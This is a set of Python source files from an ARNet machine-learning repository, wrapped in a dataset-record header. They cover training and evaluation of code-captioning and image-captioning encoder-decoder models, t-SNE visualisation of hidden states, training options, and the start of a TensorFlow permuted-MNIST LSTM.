metadata
dict
text
stringlengths
60
3.49M
{ "source": "201528014227051/ARNet", "score": 2 }
#### File: ARNet/code_captioning/code_caption_soft_att_rcst.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import time import ipdb import random import torch import torch.optim as optim from torch.autograd import Variable from utils_model import * from class_soft_att_rcst import * def ARNet(opt): if os.path.isdir(opt.rcst_model_save_path) is False: os.mkdir(opt.rcst_model_save_path) torch.manual_seed(opt.seed) torch.cuda.manual_seed(opt.seed) model = AttEncodeDecodeARNet(opt) model.load_state_dict(torch.load(opt.rcst_model_base_path)) model.cuda() model.train() encode_decode_criterion = EncodeDecodeCriterion() current_learning_rate = opt.learning_rate optimizer = optim.Adam(model.parameters(), lr=current_learning_rate, betas=(opt.optim_alpha, opt.optim_beta), weight_decay=opt.optim_weight_decay) train_data_index = list(range(len(train_data))) val_data_index = list(range(len(val_data))) iter_idx = 0 max_score = 0.0 max_epoch = 0 for epoch in range(opt.max_epochs): random.shuffle(train_data_index) if epoch != 0 and epoch % opt.learning_rate_decay_every == 0: current_learning_rate *= opt.learning_rate_decay_rate set_lr(optimizer, current_learning_rate) for start, end in zip(range(0, len(train_data_index), opt.batch_size), range(opt.batch_size, len(train_data_index), opt.batch_size)): time_start = time.time() # wait for synchronize torch.cuda.synchronize() current_code_matrix = [] current_comment_matrix = [] current_comment_mask = [] current_comment_next = [] current_batch_index = train_data_index[start:end] for idx in current_batch_index: current_code_matrix.append(train_data[idx]['code_matrix']) current_comment_matrix.append(train_data[idx]['comment_matrix']) current_comment_mask.append(train_data[idx]['comment_mask']) current_comment_next.append(train_data[idx]['comment_next']) current_code_matrix = np.reshape(current_code_matrix, [-1, opt.code_truncate]) current_comment_matrix = np.reshape(current_comment_matrix, [-1, opt.comment_truncate]) current_comment_mask = np.reshape(current_comment_mask, [-1, opt.comment_truncate]) current_comment_next = np.reshape(current_comment_next, [-1, opt.comment_truncate]) current_code_matrix_cuda = Variable(torch.from_numpy(current_code_matrix), requires_grad=False).cuda() current_comment_matrix_cuda = Variable(torch.from_numpy(current_comment_matrix), requires_grad=False).cuda() current_comment_mask_cuda = Variable(torch.from_numpy(current_comment_mask), requires_grad=False).cuda() current_comment_next_cuda = Variable(torch.from_numpy(current_comment_next), requires_grad=False).cuda() optimizer.zero_grad() decode_logit_seq, rcst_loss = model.forward(current_code_matrix_cuda, current_comment_matrix_cuda, current_comment_mask_cuda) encode_decode_loss = encode_decode_criterion.forward(decode_logit_seq, current_comment_next_cuda, current_comment_mask_cuda) # backward total_loss = encode_decode_loss + rcst_loss total_loss.backward() # update params optimizer.step() # wait for synchronize torch.cuda.synchronize() encode_decode_loss_val = encode_decode_loss.data[0] rcst_loss_val = rcst_loss.data[0] iter_idx += 1 time_end = time.time() print("{} {} epoch: {} lr: {:.8f} encode_decode_loss: {:.3f} rcst_loss: {:.3f} time: {:.3f}".format(iter_idx, start, epoch, current_learning_rate, encode_decode_loss_val, rcst_loss_val, time_end - time_start)) if np.mod(epoch, 1) == 0: print("\nepoch {} is done, saving the model ...".format(epoch)) parameter_path = os.path.join(opt.rcst_model_save_path, 'model_epoch-' + str(epoch) + '.pth') torch.save(model.state_dict(), parameter_path) print("\nparameter model saved to {}".format(parameter_path)) optimizer_path = os.path.join(opt.rcst_model_save_path, 'optimizer_epoch-' + str(epoch) + '.pth') torch.save(optimizer.state_dict(), optimizer_path) print("\noptimizer model saved to {}".format(optimizer_path)) model.eval() greedy_results = [] gts_data = [] for start, end in zip(range(0, len(val_data_index), opt.batch_size), range(opt.batch_size, len(val_data_index), opt.batch_size)): current_code_matrix = [] current_comment_matrix = [] current_comment_mask = [] current_comment_next = [] current_batch_index = val_data_index[start:end] for idx in current_batch_index: current_code_matrix.append(val_data[idx]['code_matrix']) current_comment_matrix.append(val_data[idx]['comment_matrix']) current_comment_mask.append(val_data[idx]['comment_mask']) current_comment_next.append(val_data[idx]['comment_next']) current_code_matrix = np.reshape(current_code_matrix, [-1, opt.code_truncate]) current_code_matrix_cuda = Variable(torch.from_numpy(current_code_matrix), requires_grad=False).cuda() current_comment_next = np.reshape(current_comment_next, [-1, opt.comment_truncate]) greedy_seq, greedy_seq_probs, greedy_logprobs_all = model.sample(current_code_matrix_cuda, token2index['BOS'], token2index['EOS']) greedy_seq = greedy_seq.squeeze().cpu().numpy() for i in range(greedy_seq.shape[0]): greedy_results.append(greedy_seq[i]) gts_data.append(current_comment_next[i]) avg_score = get_scores(greedy_results, gts_data, token2index['BOS'], token2index['EOS']) if avg_score[0] >= max_score: max_score = avg_score[0] max_epoch = epoch print("epoch: {} Bleu_1: {:.5f} Bleu_2: {:.5f} Bleu_3: {:.5f} Bleu_4: {:.5f} max_epoch: {}".format(epoch, avg_score[0], avg_score[1], avg_score[2], avg_score[3], max_epoch)) if __name__ == '__main__': opt = opts.parse_opt() ARNet(opt) ``` #### File: ARNet/code_captioning/prepro_tsne_reduction_vis.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import ipdb import time import math import argparse import numpy as np import matplotlib.pyplot as plt from six.moves import cPickle from sklearn import manifold def plot_embedding(X, batch_size, title=None): x_min, x_max = np.min(X, 0), np.max(X, 0) X = (X - x_min) / (x_max - x_min) fig = plt.figure() fig.suptitle(title, fontsize=14, fontweight='bold') ax = fig.add_subplot(111) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) for i in range(X.shape[0]): if i < batch_size: ax.plot(X[i, 0], X[i, 1], color='yellowgreen', marker='.') # teacher forcing hidden states else: ax.plot(X[i, 0], X[i, 1], color='orangered', marker='.') # free running hidden states def cosine_similarity(v1, v2): """ compute cosine similarity of v1 to v2: (v1 dot v2)/{||v1||*||v2||) """ sumxx, sumxy, sumyy = 0, 0, 0 for i in range(len(v1)): x = v1[i] y = v2[i] sumxx += x*x sumyy += y*y sumxy += x*y return 1.0 - sumxy / math.sqrt(sumxx * sumyy) def dim_reduction(opt): teacher_forcing_hidden_reduction = [] free_running_hidden_reduction = [] for start, end in [(opt.vis_batch_size * opt.truncation, opt.vis_batch_size * (opt.truncation + 1))]: current_teacher_forcing_hidden = teacher_forcing_hidden[start:end, :] current_free_running_hidden = free_running_hidden[start:end, :] current_hidden = np.concatenate((current_teacher_forcing_hidden, current_free_running_hidden), axis=0) tsne = manifold.TSNE(n_components=2, init='pca', random_state=0) current_hidden_reduction = tsne.fit_transform(current_hidden) teacher_forcing_hidden_reduction.append(current_hidden_reduction[0:opt.vis_batch_size, :]) free_running_hidden_reduction.append(current_hidden_reduction[opt.vis_batch_size:, :]) teacher_forcing_hidden_reduction = np.reshape(teacher_forcing_hidden_reduction, [-1, 2]) free_running_hidden_reduction = np.reshape(free_running_hidden_reduction, [-1, 2]) hidden_reduction = np.concatenate((teacher_forcing_hidden_reduction, free_running_hidden_reduction), axis=0) return hidden_reduction def calculate_distance(teacher_forcing_hidden, free_running_hidden): bsize = free_running_hidden.shape[0] mean_teacher_forcing = np.mean(teacher_forcing_hidden, axis=0) mean_free_running = np.mean(free_running_hidden, axis=0) distance_mc = np.sqrt(np.sum(np.square(mean_teacher_forcing - mean_free_running))) distance_pw = np.sqrt(np.sum(np.square(teacher_forcing_hidden - free_running_hidden), 1)) print("distance_mc: {}".format(distance_mc)) print("distance_pw: {}".format(np.sum(distance_pw) / bsize)) # cosine distance distance_cosine = 0.0 for i in range(bsize): current_tf_h = teacher_forcing_hidden[i] current_fr_h = free_running_hidden[i] distance_cosine += cosine_similarity(current_tf_h, current_fr_h) print("cosine distance_pw: {}".format(distance_cosine / bsize)) print("cosine distance_mc: {}".format(cosine_similarity(mean_teacher_forcing, mean_free_running))) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--hidden_path', type=str, default='example: models/soft_attention_seed_117/model_epoch-51_hidden_states.pkl') parser.add_argument('--hidden_reduction_save_path', type=str, default='example: models/soft_attention_seed_117/model_epoch-51_hidden_states_reduction.pkl') parser.add_argument('--vis_batch_size', type=int, default=80) parser.add_argument('--truncation', type=int, default=20) opt = parser.parse_args() with open(opt.hidden_path, 'rb') as f: hidden_states = cPickle.load(f) teacher_forcing_hidden = np.squeeze(hidden_states['teacher_forcing']) free_running_hidden = np.squeeze(hidden_states['free_running']) # calculate the distances calculate_distance(teacher_forcing_hidden, free_running_hidden) # dimensionality reduction hidden_reduction = dim_reduction(opt) with open(opt.hidden_reduction_save_path, 'wb') as f: cPickle.dump(hidden_reduction, f) # visualize the hidden states after dimensionality reduction plot_embedding(hidden_reduction, opt.vis_batch_size, "t-SNE visilization") plt.show() ``` #### File: ARNet/image_captioning/class_ende.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import ipdb import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.autograd import * from classLSTMCore import LSTMCore class EncoderDecoder(nn.Module): def __init__(self, opt): super(EncoderDecoder, self).__init__() self.vocab_size = opt.vocab_size self.input_encoding_size = opt.input_encoding_size self.lstm_size = opt.lstm_size self.drop_prob_lm = opt.drop_prob_lm self.seq_length = opt.seq_length self.fc_feat_size = opt.fc_feat_size self.img_embed = nn.Linear(self.fc_feat_size, self.input_encoding_size) self.LSTMCore = LSTMCore(self.input_encoding_size, self.lstm_size, self.drop_prob_lm) self.embed = nn.Embedding(self.vocab_size + 1, self.input_encoding_size) self.logit = nn.Linear(self.lstm_size, self.vocab_size) self.init_weights() def init_weights(self): initrange = 0.1 self.img_embed.weight.data.uniform_(-initrange, initrange) self.img_embed.bias.data.fill_(0) self.embed.weight.data.uniform_(-initrange, initrange) self.logit.weight.data.uniform_(-initrange, initrange) self.logit.bias.data.fill_(0) def init_hidden(self, batch_size): weight = next(self.parameters()).data return (Variable(weight.new(1, batch_size, self.lstm_size).zero_()), Variable(weight.new(1, batch_size, self.lstm_size).zero_())) def forward(self, fc_feats, seq): batch_size = fc_feats.size(0) state = self.init_hidden(batch_size) outputs = [] for i in range(seq.size(1)): if i == 0: xt = self.img_embed(fc_feats) else: it = seq[:, i-1].clone() if seq[:, i-1].data.sum() == 0: break xt = self.embed(it) output, state = self.LSTMCore.forward(xt, state) if i > 0: output = F.log_softmax(self.logit(output.squeeze(0))) outputs.append(output) return torch.cat([_.unsqueeze(1) for _ in outputs], 1).contiguous() def sample_beam(self, fc_feats, init_index, opt={}): beam_size = opt.get('beam_size', 3) # 如果不能取到 beam_size 这个变量, 则令 beam_size 为 3 batch_size = fc_feats.size(0) seq = torch.LongTensor(self.seq_length, batch_size).zero_() seqLogprobs = torch.FloatTensor(self.seq_length, batch_size) top_seq = [] top_prob = [[] for _ in range(batch_size)] done_beams = [[] for _ in range(batch_size)] for k in range(batch_size): state = self.init_hidden(beam_size) beam_seq = torch.LongTensor(self.seq_length, beam_size).zero_() beam_seq_logprobs = torch.FloatTensor(self.seq_length, beam_size).zero_() beam_logprobs_sum = torch.zeros(beam_size) # running sum of logprobs for each beam for t in range(self.seq_length + 1): if t == 0: xt = self.img_embed(fc_feats[k:k+1]).expand(beam_size, self.input_encoding_size) elif t == 1: it = fc_feats.data.new(beam_size).long().fill_(init_index) xt = self.embed(Variable(it, requires_grad=False)) else: logprobsf = logprobs.float() ys, ix = torch.sort(logprobsf, 1, True) candidates = [] cols = min(beam_size, ys.size(1)) rows = beam_size if t == 2: # at first time step only the first beam is active rows = 1 for c in range(cols): for q in range(rows): # compute logprob of expanding beam q with word in (sorted) position c local_logprob = ys[q, c] candidate_logprob = beam_logprobs_sum[q] + local_logprob candidates.append({'c': ix.data[q, c], 'q': q, 'p': candidate_logprob.data[0], 'r': local_logprob.data[0]}) candidates = sorted(candidates, key=lambda x: -x['p']) # construct new beams new_state = [_.clone() for _ in state] if t > 2: # well need these as reference when we fork beams around beam_seq_prev = beam_seq[:t-2].clone() beam_seq_logprobs_prev = beam_seq_logprobs[:t-2].clone() for vix in range(beam_size): v = candidates[vix] # fork beam index q into index vix if t > 2: beam_seq[:t - 2, vix] = beam_seq_prev[:, v['q']] beam_seq_logprobs[:t - 2, vix] = beam_seq_logprobs_prev[:, v['q']] # rearrange recurrent states for state_ix in range(len(new_state)): # copy over state in previous beam q to new beam at vix new_state[state_ix][0, vix] = state[state_ix][0, v['q']] # dimension one is time step # append new end terminal at the end of this beam beam_seq[t - 2, vix] = v['c'] # c'th word is the continuation beam_seq_logprobs[t - 2, vix] = v['r'] # the raw logprob here beam_logprobs_sum[vix] = v['p'] # the new (sum) logprob along this beam if v['c'] == 0 or t == self.seq_length: # END token special case here, or we reached the end. # add the beam to a set of done beams done_beams[k].append({'seq': beam_seq[:, vix].clone(), 'logps': beam_seq_logprobs[:, vix].clone(), 'p': beam_logprobs_sum[vix]}) # encode as vectors it = beam_seq[t - 2] xt = self.embed(Variable(it.cuda())) if t >= 2: state = new_state output, state = self.LSTMCore.forward(xt, state) logprobs = F.log_softmax(self.logit(output)) done_beams[k] = sorted(done_beams[k], key=lambda x: -x['p']) seq[:, k] = done_beams[k][0]['seq'] # the first beam has highest cumulative score seqLogprobs[:, k] = done_beams[k][0]['logps'] # save result l = len(done_beams[k]) top_seq_cur = torch.LongTensor(l, self.seq_length).zero_() for temp_index in range(l): top_seq_cur[temp_index] = done_beams[k][temp_index]['seq'].clone() top_prob[k].append(done_beams[k][temp_index]['p']) top_seq.append(top_seq_cur) # return the samples and their log likelihoods return seq.transpose(0, 1), seqLogprobs.transpose(0, 1), top_seq, top_prob def sample(self, fc_feats, init_index, opt={}): beam_size = opt.get('beam_size', 1) if beam_size > 1: return self.sample_beam(fc_feats, init_index, opt) batch_size = fc_feats.size(0) seq = [] seqLogprobs = [] logprobs_all = [] state = self.init_hidden(batch_size) for t in range(self.seq_length): if t == 0: xt = self.img_embed(fc_feats) else: if t == 1: it = fc_feats.data.new(batch_size).long().fill_(init_index) else: sampleLogprobs, it = torch.max(logprobs.data, 1) it = it.view(-1).long() xt = self.embed(Variable(it, requires_grad=False).cuda()) if t >= 2: if t == 2: unfinished = it > 0 else: unfinished *= (it > 0) if unfinished.sum() == 0: break it = it * unfinished.type_as(it) seq.append(it) seqLogprobs.append(sampleLogprobs.view(-1)) output, state = self.LSTMCore.forward(xt, state) logprobs = F.log_softmax(self.logit(output)) logprobs_all.append(logprobs) return torch.cat([_.unsqueeze(1) for _ in seq], 1), \ torch.cat([_.unsqueeze(1) for _ in seqLogprobs], 1), \ torch.cat([_.unsqueeze(1) for _ in logprobs_all], 1).contiguous() def teacher_forcing_get_hidden_states(self, fc_feats, seq): batch_size = fc_feats.size(0) state = self.init_hidden(batch_size) outputs = [] for i in range(seq.size(1)): if i == 0: xt = self.img_embed(fc_feats) else: it = seq[:, i-1].clone() if seq[:, i-1].data.sum() == 0: break xt = self.embed(it) output, state = self.LSTMCore.forward(xt, state) if i > 0: if batch_size == 1: output = F.log_softmax(self.logit(output)) else: output = F.log_softmax(self.logit(output.squeeze(0))) outputs.append(output) return state[0], outputs def free_running_get_hidden_states(self, fc_feats, init_index, end_index): batch_size = fc_feats.size(0) seq = [] seqLogprobs = [] logprobs_all = [] state = self.init_hidden(batch_size) for t in range(self.seq_length): if t == 0: xt = self.img_embed(fc_feats) if t == 1: it = fc_feats.data.new(batch_size).long().fill_(init_index) xt = self.embed(Variable(it, requires_grad=False).cuda()) if t >= 2: sampleLogprobs, it = torch.max(logprobs.data, 1) it = it.view(-1).long() if it.cpu().numpy()[0] == end_index: break xt = self.embed(Variable(it, requires_grad=False).cuda()) seq.append(it) seqLogprobs.append(sampleLogprobs.view(-1)) output, state = self.LSTMCore.forward(xt, state) logprobs = F.log_softmax(self.logit(output)) logprobs_all.append(logprobs) return state[0], logprobs_all ``` #### File: ARNet/image_captioning/image_caption_ende_xe.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import time import ipdb import random from six.moves import cPickle import torch import torch.optim as optim from torch.autograd import * from utils_model import * from class_ende import * def train_xe(opt): opt.vocab_size = len(idx_to_word) max_CIDEr = 0.0 max_CIDEr_epoch = 0 torch.manual_seed(opt.seed) torch.cuda.manual_seed(opt.seed) model = EncoderDecoder(opt) model.cuda() model.train() criterion = LanguageModelCriterion() # check compatibility if training is continued from previously saved model if vars(opt).get('start_from', None) is not None: assert os.path.isdir(opt.start_from), " %s must be a a path" % opt.start_from model.load_state_dict(torch.load(os.path.join(opt.start_from, 'model_epoch-' + str(opt.start_from_epoch) + '.pth'))) current_learning_rate = opt.learning_rate if opt.optim == 'adam': optimizer = optim.Adam(model.parameters(), lr=current_learning_rate, betas=(opt.optim_alpha, opt.optim_beta), weight_decay=opt.optim_weight_decay) else: raise Exception("optim not supported: {}".format(opt.feature_type)) # load optimizer if vars(opt).get('start_from', None) is not None: optimizer.load_state_dict(torch.load(os.path.join(opt.start_from, 'optimizer_epoch-' + str(opt.start_from_epoch) + '.pth'))) set_lr(optimizer, opt.scst_learning_rate) for epoch in range(opt.max_epochs): random.shuffle(train_images_names) if epoch != opt.learning_rate_decay_start and epoch % opt.learning_rate_decay_every == 0: current_learning_rate *= opt.learning_rate_decay_rate set_lr(optimizer, current_learning_rate) for start, end in zip(range(0, len(train_images_names), int(opt.batch_size/opt.seq_per_img)), range(int(opt.batch_size/opt.seq_per_img), len(train_images_names), int(opt.batch_size/opt.seq_per_img))): time_start = time.time() # wait for synchronize torch.cuda.synchronize() current_feats_fc = [] current_gt_sents = [] image_names = train_images_names[start:end] for image_name in image_names: img_feat_fc = np.load(os.path.join(opt.fc_feat_path, image_name + '.npy')) img_feat_fc = np.reshape(img_feat_fc, [opt.fc_feat_size]) for i in range(opt.seq_per_img): current_feats_fc.append(img_feat_fc) current_gt_sents.append(train_images_captions_index[image_name][i]) current_feats_fc = np.reshape(current_feats_fc, [-1, opt.fc_feat_size]) current_gt_sents = np.asarray(current_gt_sents).astype(np.int64) current_masks = np.zeros((current_gt_sents.shape[0], current_gt_sents.shape[1]), dtype=np.float32) # in PY3, map is a generator, refer: https://stackoverflow.com/questions/44511752 nonzeros = np.array(list(map(lambda x: (x != 0).sum(), current_gt_sents))) for ind, row in enumerate(current_masks): row[:nonzeros[ind]] = 1 current_feats_fc_cuda = Variable(torch.from_numpy(current_feats_fc), requires_grad=False).cuda() current_gt_sents_cuda = Variable(torch.from_numpy(current_gt_sents), requires_grad=False).cuda() current_masks_cuda = Variable(torch.from_numpy(current_masks), requires_grad=False).cuda() # zero gradient optimizer.zero_grad() criterion_input = model.forward(current_feats_fc_cuda, current_gt_sents_cuda) loss = criterion.forward(criterion_input, current_gt_sents_cuda[:, 1:], current_masks_cuda) # backward loss.backward() # clip gradient # clip_gradient(optimizer, opt.grad_clip) # update params optimizer.step() train_loss = loss.data[0] # wait for synchronize torch.cuda.synchronize() time_end = time.time() print("idx: {} epoch: {} lr: {:.10f} loss: {:.3f} time: {:.3f}".format(start, epoch, current_learning_rate, train_loss, time_end - time_start)) if np.mod(epoch, 1) == 0: print("epoch {} is done, saving the model ...".format(epoch)) parameter_path = os.path.join(opt.xe_model_save_path, 'model_epoch-' + str(epoch) + '.pth') torch.save(model.state_dict(), parameter_path) print("parameter model saved to {}".format(parameter_path)) optimizer_path = os.path.join(opt.xe_model_save_path, 'optimizer_epoch-' + str(epoch) + '.pth') torch.save(optimizer.state_dict(), optimizer_path) print("optimizer model saved to {}".format(optimizer_path)) model.eval() val_images_sents = [] for idx, image_name in enumerate(val_images_names): img_feat_fc = np.load(os.path.join(opt.fc_feat_path, image_name + '.npy')) img_feat_fc = np.reshape(img_feat_fc, [1, opt.fc_feat_size]) img_feat_fc_cuda = Variable(torch.from_numpy(img_feat_fc), requires_grad=False).cuda() greedy_seq, _, _ = model.sample(img_feat_fc_cuda, word_to_idx['BOS'], {'sample_max': 1}) img_sent = index_to_sentence(list(greedy_seq.cpu().numpy().squeeze(0))) val_images_sents.append(img_sent) Bleu_1, Bleu_2, Bleu_3, Bleu_4, CIDEr, METEOR, ROUGE_L, SPICE = evaluate(opt.train_json_path, val_images_names, val_images_sents) model.train() if CIDEr >= max_CIDEr: max_CIDEr = CIDEr max_CIDEr_epoch = epoch print('current_CIDEr: {:.5f} max_CIDEr: {:.5f} max_CIDEr_epoch: {}'.format(CIDEr, max_CIDEr, max_CIDEr_epoch)) if epoch - max_CIDEr_epoch > opt.early_stop_value: print('CIDEr has no improvement, stop. Max CIDEr value: {}, max epoch: {}'.format(max_CIDEr, max_CIDEr_epoch)) sys.exit(0) if __name__ == '__main__': opt = opts.parse_opt() if opt.version == 'offline': train_images_names = open(opt.train_split, 'r').read().splitlines() + open(opt.restval_split, 'r').read().splitlines() val_images_names = open(opt.val_split, 'r').read().splitlines() elif opt.version == 'online': train_images_names = open(opt.train_split_online, 'r').read().splitlines() val_images_names = open(opt.val_split_online, 'r').read().splitlines() if os.path.isdir(opt.xe_model_save_path) is False: os.mkdir(opt.xe_model_save_path) train_xe(opt) ``` #### File: ARNet/image_captioning/opts.py ```python import argparse import sys def parse_opt(): parser = argparse.ArgumentParser() parser.add_argument('--device', type=int, default=0) parser.add_argument('--function', type=str, default='train_with_mle') parser.add_argument('--version', type=str, default='offline') parser.add_argument('--train_annotations', type=str, default='data/annotations/captions_train2014.json') parser.add_argument('--val_annotations', type=str, default='data/annotations/captions_val2014.json') # karpathy's splits parser.add_argument('--train_split', type=str, default='data/splits/coco_train.txt') parser.add_argument('--test_split', type=str, default='data/splits/coco_test.txt') parser.add_argument('--val_split', type=str, default='data/splits/coco_val.txt') parser.add_argument('--restval_split', type=str, default='data/splits/coco_restval.txt') # official splits parser.add_argument('--train_split_online', type=str, default='data/splits/coco_train_online.txt') parser.add_argument('--val_split_online', type=str, default='data/splits/coco_val_online.txt') # params of preprocessed data parser.add_argument('--train_val_imageNames_to_imageIDs_path', type=str, default='data/train_val_imageNames_to_imageIDs.pkl') parser.add_argument('--official_train_captions_path', type=str, default='data/train_images_captions_official.pkl') parser.add_argument('--official_val_captions_path', type=str, default='data/val_images_captions_official.pkl') parser.add_argument('--train_images_captions_path', type=str, default='data/train_images_captions.pkl') parser.add_argument('--val_images_captions_path', type=str, default='data/val_images_captions.pkl') parser.add_argument('--word_to_idx_path', type=str, default='data/word_to_idx.pkl') parser.add_argument('--idx_to_word_path', type=str, default='data/idx_to_word.pkl') parser.add_argument('--bias_init_vector_path', type=str, default='data/bias_init_vector.pkl') parser.add_argument('--train_images_captions_index', type=str, default='data/train_images_captions_index.pkl') # params of focal loss parser.add_argument('--focal_gamma', type=float, default=2) # batch normalization parser.add_argument('--epsilon', type=float, default=0.001) # label smoothing parser.add_argument('--label_smoothing', type=float, default=0.1) # params of t-SNE visualization parser.add_argument('--vis_batch_size', type=int, default=64) parser.add_argument('--vis_model_path', type=str, default='') parser.add_argument('--vis_save_path', type=str, default='') # ARNet parser.add_argument('--rcst_time', type=int, default=1) parser.add_argument('--rcst_size', type=int, default=512) parser.add_argument('--rcst_weight', type=float, default=0.005) parser.add_argument('--rcst_learning_rate', type=float, default=0.0005) parser.add_argument('--rcst_model_save_path', type=str, default='') parser.add_argument('--rcst_model_path', type=str, default='') parser.add_argument('--rcst_train_json_path', type=str, default='') # params of ZoneOut parser.add_argument('--zoneout_factor_cell', type=float, default=0.1) parser.add_argument('--zoneout_factor_output', type=float, default=0.0) # ensemble model parser.add_argument('--ensemble_file_path', type=str, default='data/splits/coco_test.txt') parser.add_argument('--ensemble_json_path', type=str, default='') parser.add_argument('--ensemble_model_0', type=str, default='') parser.add_argument('--ensemble_model_1', type=str, default='') parser.add_argument('--ensemble_model_2', type=str, default='') parser.add_argument('--ensemble_model_3', type=str, default='') parser.add_argument('--ensemble_model_4', type=str, default='') parser.add_argument('--ensemble_model_5', type=str, default='') # inference function parameters parser.add_argument('--infer_file_path', type=str, default='data/splits/coco_test.txt') parser.add_argument('--infer_json_path', type=str, default='') parser.add_argument('--infer_model_path', type=str, default='') # self-critical training function parameters parser.add_argument('--grad_clip', type=float, default=0.1, help='clip gradients at this value') parser.add_argument('--scst_learning_rate', type=float, default=0.00005) parser.add_argument('--scst_learning_rate_decay', type=float, default=0.8) parser.add_argument('--scst_loss_mixed_gamma', type=float, default=0.0016) parser.add_argument('--scst_batch_size', type=int, default=8) parser.add_argument('--scst_epochs', type=int, default=200) parser.add_argument('--reward_method', type=str, default='CIDEr') parser.add_argument('--scst_base_model_path', type=str, default='') parser.add_argument('--scst_model_save_path', type=str, default='') parser.add_argument('--scst_train_json_path', type=str, default='') # caption_with_beam_search function parameters parser.add_argument('--beam_model_path', type=str, default='') parser.add_argument('--beam_file_path', type=str, default='data/splits/coco_test.txt') parser.add_argument('--beam_json_path', type=str, default='') parser.add_argument('--beam_size', type=int, default=1) parser.add_argument('--beam_length_normalization_factor', type=float, default=0.0) # from <NAME> parser.add_argument('--train_only', type=int, default=0) parser.add_argument('--caption_model', type=str, default='caption_model') parser.add_argument('--input_json', type=str, default='data/cocotalk.json') parser.add_argument('--input_label_h5', type=str, default='data/cocotalk_label.h5') parser.add_argument('--load_best_score', type=int, default=0) parser.add_argument('--temperature', type=float, default=1.0) # XE 训练的一些参数, 路径 parser.add_argument('--train_json_path', type=str, default='') parser.add_argument('--model_save_basepath', type=str, default='models') parser.add_argument('--model_name', type=str, default='') parser.add_argument('--xe_model_save_path', type=str, default='') # 从上次训练保存的 model 文件开始接着训练 parser.add_argument('--start_from', type=str, default=None) parser.add_argument('--start_from_epoch', type=int, default=0) parser.add_argument('--use_cuda', type=bool, default=True) parser.add_argument('--seed', type=int, default=110) parser.add_argument('--max_epochs', type=int, default=100) parser.add_argument('--seq_per_img', type=int, default=5) parser.add_argument('--batch_size', type=int, default=80) parser.add_argument('--early_stop_value', type=int, default=10) # params of optimizer parser.add_argument('--optim', type=str, default='adam') parser.add_argument('--learning_rate', type=float, default=5e-4) parser.add_argument('--learning_rate_decay_start', type=int, default=0) parser.add_argument('--learning_rate_decay_every', type=int, default=3) parser.add_argument('--learning_rate_decay_rate', type=float, default=0.8,) parser.add_argument('--optim_alpha', type=float, default=0.9) parser.add_argument('--optim_beta', type=float, default=0.999) parser.add_argument('--optim_epsilon', type=float, default=1e-8) parser.add_argument('--optim_weight_decay', type=float, default=0.00001) # params of ZoneOut parser.add_argument('--c_ratio', type=float, default=0.0) parser.add_argument('--h_ratio', type=float, default=0.0) # params of Scheduled Sampling (SS) parser.add_argument('--ss_prob', type=float, default=0.0) parser.add_argument('--ss_start', type=int, default=-1) parser.add_argument('--ss_increase_every', type=int, default=5) parser.add_argument('--ss_increase_prob', type=float, default=0.05) parser.add_argument('--ss_max_prob', type=float, default=0.25) # params of ReviewNet parser.add_argument('--n_reviewers', type=int, default=8) parser.add_argument('--input_encoding_size', type=int, default=512) parser.add_argument('--lstm_size', type=int, default=512) parser.add_argument('--lstm_step', type=int, default=30) parser.add_argument('--seq_length', type=int, default=30) parser.add_argument('--vocab_size', type=int, default=10516) parser.add_argument('--word_embed_size', type=int, default=512) parser.add_argument('--conv_feat_size', type=int, default=1536) parser.add_argument('--conv_att_size', type=int, default=64) parser.add_argument('--fc_feat_size', type=int, default=1536) parser.add_argument('--att_hidden_size', type=int, default=512) parser.add_argument('--top_word_count', type=int, default=1000) parser.add_argument('--feature_type', type=str, default='inception_v4') # conv features and fc features, default is inception-v4 parser.add_argument('--conv_feat_path', type=str, default='data/feats/mscoco_feats_v4_conv') parser.add_argument('--fc_feat_path', type=str, default='data/feats/mscoco_feats_v4_fc') args = parser.parse_args() if args.feature_type == 'inception_v3': args.conv_feat_path = 'data/feats/train_val_test_feats_v3_conv' args.fc_feat_path = 'data/feats/train_val_test_feats_v3_fc' args.conv_feat_size = 1280 args.conv_att_size = 64 args.fc_feat_size = 2048 elif args.feature_type == 'inception_v4': args.conv_feat_path = 'data/feats/mscoco_feats_v4_conv' args.fc_feat_path = 'data/feats/mscoco_feats_v4_fc' args.conv_feat_size = 1536 args.conv_att_size = 64 args.fc_feat_size = 1536 elif args.feature_type == 'densenet': args.input_fc_dir = 'data/feats/train_val_test_feats_densenet161_conv' args.input_att_dir = 'data/feats/train_val_test_feats_densenet161_conv' args.conv_feat_size = 2208 args.conv_att_size = 49 args.fc_feat_size = 2208 return args if __name__ == '__main__': opt = parse_opt() opt_dict = vars(opt) for k, v in opt_dict.items(): print(k + ': \t' + str(v)) ``` #### File: ARNet/permuted_sequential_mnist/tf_permuted_mnist_lstm_rcst.py ```python import os import opts import ipdb import time import random import numpy as np from six.moves import cPickle import keras from keras.datasets import mnist import tensorflow as tf class LSTM(): def __init__(self, opt): self.lstm_step = opt.lstm_step self.batch_size = opt.batch_size self.lstm_size = opt.lstm_size self.lstm = tf.contrib.rnn.BasicLSTMCell(self.lstm_size, state_is_tuple=True) self.logit_W = tf.Variable(tf.random_uniform([self.lstm_size, 10], -0.08, 0.08), name='logit_W') self.logit_b = tf.Variable(tf.zeros([10]), name='logit_b') # ARNet self.rcst_weight = opt.rcst_weight self.lstm_rcst = tf.contrib.rnn.BasicLSTMCell(self.lstm_size, state_is_tuple=True) self.linear_rcst_W = tf.Variable(tf.random_uniform([self.lstm_size, self.lstm_size], -0.08, 0.08), name='linear_rcst_W') self.linear_rcst_b = tf.Variable(tf.zeros([self.lstm_size]), name='linear_rcst_b') def build_model(self): pixels = tf.placeholder(tf.float32, [self.batch_size, self.lstm_step, 1]) onehot_labels = tf.placeholder(tf.int32, [self.batch_size, 10]) state = self.lstm.zero_state(batch_size=self.batch_size, dtype=tf.float32) state_rcst = self.lstm.zero_state(batch_size=self.batch_size, dtype=tf.float32) prev_h = state[1] rcst_loss = 0.0 for i in range(0, self.lstm_step): with tf.variable_scope("LSTM"): if i > 0: tf.get_variable_scope().reuse_variables() output, state = self.lstm(pixels[:, i], state) if i == self.lstm_step - 1: logit_outputs = tf.matmul(output, self.logit_W) + self.logit_b 